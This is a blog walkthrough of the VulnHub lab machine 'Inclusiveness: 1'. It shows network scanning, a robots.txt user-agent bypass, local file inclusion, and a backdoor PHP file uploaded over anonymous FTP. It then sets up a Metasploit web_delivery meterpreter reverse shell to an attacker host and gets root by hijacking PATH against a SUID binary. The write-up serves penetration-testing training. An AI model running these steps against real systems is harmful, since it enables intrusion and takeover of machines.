Another
walkthrough for the vulnhub machine “INCLUSIVENESS: 1” which is an Intemediate
level lab designed by the author “h4sh5 & Richard Lee” to give a taste to
the OSCP Labs. The challenge is same just like any other CTF challenge where
you identify the flag with the help of your pentest skill.
Download it from
here: https://www.vulnhub.com/entry/inclusiveness-1,422/
Penetration Testing Methodologies
Network Scanning
·
Netdiscover
·
nmap
Enumeration
·
Robots.txt
·
User agent restriction bypass
·
LFI
Exploiting LFI
·
LFI To RCE
Privilege Escalation
·
Abusing
PATH Variable
Walkthrough
Network Scanning
So, as we always
start with netdiscover to get the IP of the VM machine and the IP of the host
I’ve found is 192.168.29.151.
Let’s proceed with network scan using Nmap
aggressive scan as given below.
nmap -p- -A 192168.29.151
And as a result, we find that port 21 is
open for FTP where anonymous login has been allowed and the directory name as
/pub is writeable, and port 80 and 22 are also accessible for HTTP and SSH
respectively.
Enumeration
To find any loopholes we need to list more,
so we're browsing the host IP in the web browser, but unfortunately, they were
found only the "Apache2 Debian Default page."
Instead we try to check for the robots.txt
file and, as a result, the message "You are not a search engine!" is
shown. You can't read my robots.txt!
Without wasting time, I try to bypass this
restriction by editing a new useragent in my firefox using the following
steps:
·
Inside the url tab search for “about:config”
·
Then search for preference
Name: useragnet
·
Make a right click then > New
> String
You get a dialog box; enter the preference
name “general.useragent.overriide” as shown in the below image.
Enter the string value to provide useragent
“GoogleBot”.
Once the above steps have been completed,
the record will be shown for your new edit preference.
Now reload the URL for /robots.txt page and
you will be able to read the disallowed entry as “/secret_informtion/” as shown
below.
So, we've explored /secret_information, it
brings a web page that describes "DNS Zone Transfer Attack" and the
web page contains two hyperlinks "English & Spanish."
As I click on the
"English" hyperlink, I found that it was calling the en.php via lang
parameter in the URL, which means that there could be possibilities for LFI.
Therefore, I try to get /etc/passwd file by
abusing the php include of the webpage and as result I got the whole contents
of the /etc/passwd file as shown in the below image.
Exploiting LFI
So, it was time to exploit the
vulnerability of the LFI by injecting a malicious file and, as you know, the
FTP service is available as anonymous and / pub is a writable directory.
We then try to read the
"vsftpd.conf" FTP config file by abusing LFI to enumerate the
writeable directory path.
We've prepared a php file that contains a
malicious code that will further trigger remote command execution
vulnerabilities.
Now it’s time to upload the malicious
file “backdoor.php” on the host machine via ftp, thus follow the below commands
ftp 192.168.29.151
cd /pub
put backdoor.php
Further, we need to run the uploaded file
to execute the malicious code by executing following:
Using the URL above, try to run the
backdoor.php file and simultaneously run the OS command "Id" as shown
in the image provided here.
As we have been successful in inducing RCE
in the installed application by abusing LFI, we are continuing with
Metasploit's "web delivery" Module to compromise the
host machine in order to obtain a reverse connection.
use/exploit/multi/script/web_delivery
set target 1
set lhost 192.168.29.208
set payload
php/meterpreter/reverse_tcp
exploit
This will generate a malicious PHP code
which you’ll use for execution on the web URL as done above.
So, I copied the above malicious code and
paste it inside the URL to get the back connection of the host through the URL
execution.
Privilege Escalation
Booom!!! We hit the goal and obtain the
meterperter session the host machine, since it was boot to root CTF, we need to
escalate the root privilege shell, therefore we try to identify all programs or
files that have SUID bits enabled.
So, with the help of find command, we've
got a list of programs running as a super user that unlocks the SUID bit where
I notice /home/tom/rootshell.
Inside /root/tom/ I found rootshell.c file
and a compile file rootshell that owns SUID permissions.
According this piece of code if the file is
executed as Tom user by calling the function for “whoami” program for
validation then you will get a privilege shell else it will print user-ID that
is currently logged in will be displayed.
In simple words the rootshell program give
a high privilege shell if the output of whoami program will be “tom”.
You can easily take advantage of this
configuration by abusing the PATH system. Here, we built a file as
"whoami" in the / tmp directory, and write the following bash code to
print "tom"
cd /tmp
echo “printf “tom”” > whoami
chmod 777 whoami
Add a temporary path variable with the
help of following command. you will observe that we had added /tmp as PATH
variable.
export PATH=/tmp:$PATH
echo path
when all is done then the rootshell to
get the root privilege shell just we have obtained here as show below.
cd /home/tom
./rootshell
cd /root
cat flag.txt
Finally, we have found the root shell a
flag.txt file, this lab has good combination of basic vulnerability of Web and
OS privilege Escalation.
0 comments:
Post a Comment